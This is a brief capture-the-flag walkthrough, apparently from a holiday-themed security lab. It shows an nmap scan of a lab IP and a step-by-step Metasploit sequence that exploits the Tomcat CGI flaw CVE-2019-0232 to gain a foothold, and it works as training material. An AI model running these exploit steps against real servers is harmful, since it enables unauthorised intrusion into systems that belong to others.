Ready, set, elf.

Networking - Metasploit

Video

Resources

systeminfo

URL encoded

Challenge

What is the version number of the web server?

nmap -Pn -sC -sV -O -v 10.10.198.75

What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)

Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.

msfconsole
search 2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
show targets
set TARGET 0
show options
set RHOST 10.10.198.75
set targeturi /cgi-bin/elfwhacker.bat
exploit

What are the contents of flag1.txt

Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!

Last updated

Was this helpful?